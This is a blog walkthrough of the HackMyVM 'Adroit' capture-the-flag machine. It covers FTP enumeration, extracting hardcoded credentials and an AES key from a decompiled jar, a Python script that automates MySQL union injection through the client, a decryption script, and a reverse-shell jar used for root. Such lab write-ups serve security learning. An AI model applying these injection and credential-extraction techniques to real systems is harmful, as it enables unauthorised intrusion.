Windy's little blog

一切生活中的杂七杂八, and I like CTF.

HackMyVm Adroit Walkthrough (very tricky)

Machines can be download here.

Nmap scan ports first.

图片.png


Start from 21 port. Log in ftp as anonymous user, and download all the three files.

图片.png

Here's note.txt.

图片.png


Check the structure.PNG, which show us the working theory of the jar program. That means we can not directly connect to Mysql database, but through a proxy in the middle.

图片.png

Now the most import part, let's check the jar. First we try to execute it, nothing happened. We open it in jd-gui to see what it want to do.

Through the decompiled java code, we know things below:

(1) The jar program use AES and Base64 to encrypt and decrypt username and password, which is need to connect to the proxy.

(2) The proxy is located at adroit.local:3000.

(3) The username and password of the proxy.

图片.png


We edit /etc/hosts to add the adroit.local, then execute the jar again. It works, and ask for username and password. Just input user:pass couple from the decompiled jar file. And we can get on to operation step.

图片.png

After a few tests, we can know that "post" operation just save something in the database( The identifier should be a number).

图片.png

And the "get" operation just load the stuff from the database.

图片.png

After I test the other two ports 3306 and 33060, we get no access. Then our focus is on this app. Maybe it has a mysql injection. In fact, the program is vulnerable to mysql union select injection.

Because the jar will exit each time, so we can make a little script to automate the injection. The code is blow:

import subprocess
try:
    while True:
        p = subprocess.Popen(['java','-jar','adroitclient.jar'], stdin=subprocess.PIPE,stdout=subprocess.PIPE,bufsize=1,encoding='utf-8')
        buff = p.stdout.readline()
        p.stdin.write("zeus\n")
        buff = p.stdout.readline()
        p.stdin.write("god.thunder.olympus\n")
        buff = p.stdout.readline()
        p.stdin.write("get\n")
        buff = p.stdout.readline()
        cmd = input("Please input your mysql injection command:\n")
        p.stdin.write(cmd+"\n")
        buff = p.stdout.readline()
        print(buff)
except KeyboardInterrupt:
    exit()


The injection process is self-explained. At last, we get a username and password hash.

图片.png


Now we need to decrypt the password hash, but the hash is not a formal one.

图片.png


So maybe we can use the decryption code in the jar file to make a try. The code is below.

import base64
from Crypto.Cipher import AES

secret = "Sup3rS3cur3Dr0it"
enc_text = "l4A+n+p+xSxDcYCl0mgxKr015+OEC3aOfdrWafSqwpY="
cipher = AES.new(secret)
print(cipher.decrypt(base64.b64decode(enc_text)).decode('utf-8','ignore'))

But the output seems not a complete string, the last several words decode error.

图片.png

After a long time try and fail, I ask the author for help. He told me to check out the VM description.

图片.png


Then we change a 0 to O in the password hash, we can get the correct password.

图片.png

Now we can log in ssh. And sudo -l give us a hint.

图片.png


Because I'm not a good java coder, so I download a jar reverse shell generator from internet.

At last, we get root.

图片.png

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-BlogPHP 1.7.0